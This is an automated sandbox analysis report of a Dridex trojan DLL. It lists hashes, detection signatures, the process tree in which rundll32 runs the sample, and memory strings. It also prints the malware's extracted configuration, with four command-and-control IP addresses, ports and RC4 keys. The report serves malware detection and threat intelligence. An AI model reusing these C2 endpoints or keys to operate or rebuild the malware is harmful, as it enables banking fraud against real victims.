Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report G7ABVJxc3Z.dll

Overview

General Information

Sample Name:G7ABVJxc3Z.dll
Analysis ID:545442
MD5:47c59530065e8e7e05a855879bf8a922
SHA1:8fba3ea2428f92e8dc8497514d0817b54edc5be0
SHA256:e4db910a4147ac44bef76f71e6b0d6bd193b89a6268dda35f3b1c210cc111fe4
Tags:32dllDridexexetrojan
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Call by Ordinal
Tries to delay execution (extensive OutputDebugStringW loop)
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses 32bit PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
One or more processes crash
Tries to load missing DLLs
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6380 cmdline: loaddll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6484 cmdline: rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5728 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 740 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6496 cmdline: rundll32.exe C:\Users\user\Desktop\G7ABVJxc3Z.dll,Wgpomsdeeomtunmdrt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 864 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.740603075.000000006E471000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000003.00000002.831692261.000000006E471000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000002.00000000.742949248.000000006E471000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000003.00000000.733407707.000000006E471000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.0.rundll32.exe.6e470000.5.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              2.0.rundll32.exe.6e470000.2.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                3.2.rundll32.exe.6e470000.2.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  2.0.rundll32.exe.6e470000.5.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    0.2.loaddll32.exe.6e470000.2.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1, ProcessId: 6484

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 2.0.rundll32.exe.6e470000.2.unpackMalware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: G7ABVJxc3Z.dllVirustotal: Detection: 64%Perma Link
                      Source: G7ABVJxc3Z.dllReversingLabs: Detection: 67%
                      Machine Learning detection for sampleShow sources
                      Source: G7ABVJxc3Z.dllJoe Sandbox ML: detected
                      Source: G7ABVJxc3Z.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: G7ABVJxc3Z.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: advapi32.pdbg source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: wininet.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: shlwapi.pdb- source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.738518668.00000000047D6000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.746276509.00000000052BA000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: dwmapi.pdb9 source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: WINMMBASE.pdb/ source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb[ source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: ntdsapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: combase.pdb7 source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: powrprof.pdbO source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.775462596.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754227326.0000000005005000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000A.00000002.766190081.00000000030C2000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbE source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: fltLib.pdbO source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.739048993.0000000002A3C000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: imagehlp.pdbI source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: sechost.pdb# source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: lz32.pdbo source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb; source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ffty.pdbb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: msctf.pdbW source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754227326.0000000005005000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: propsys.pdbQ source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdba source: WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.775462596.000000004B280000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: bcrypt.pdb] source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: winmm.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wsspicli.pdbg source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: bcrypt.pdba source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: esent.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: esent.pdbM source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: pdh.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ffty.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp, G7ABVJxc3Z.dll
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: ole32.pdbC source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: lz32.pdb= source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ole32.pdb1 source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: lz32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: sfc_os.pdb] source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ws2_32.pdbE source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wimm32.pdbS source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: esent.pdb3 source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wininet.pdb) source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 104.36.167.47:443
                      Source: Malware configuration extractorIPs: 188.40.48.93:4664
                      Source: Malware configuration extractorIPs: 162.241.33.132:9217
                      Source: Malware configuration extractorIPs: 217.160.5.104:593
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewASN Name: GIGASNET-ASUS GIGASNET-ASUS
                      Source: Joe Sandbox ViewIP Address: 162.241.33.132 162.241.33.132
                      Source: Joe Sandbox ViewIP Address: 104.36.167.47 104.36.167.47
                      Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 3.0.rundll32.exe.6e470000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.rundll32.exe.6e470000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e470000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.rundll32.exe.6e470000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e470000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.6e470000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.740603075.000000006E471000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.831692261.000000006E471000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, type: MEMORY
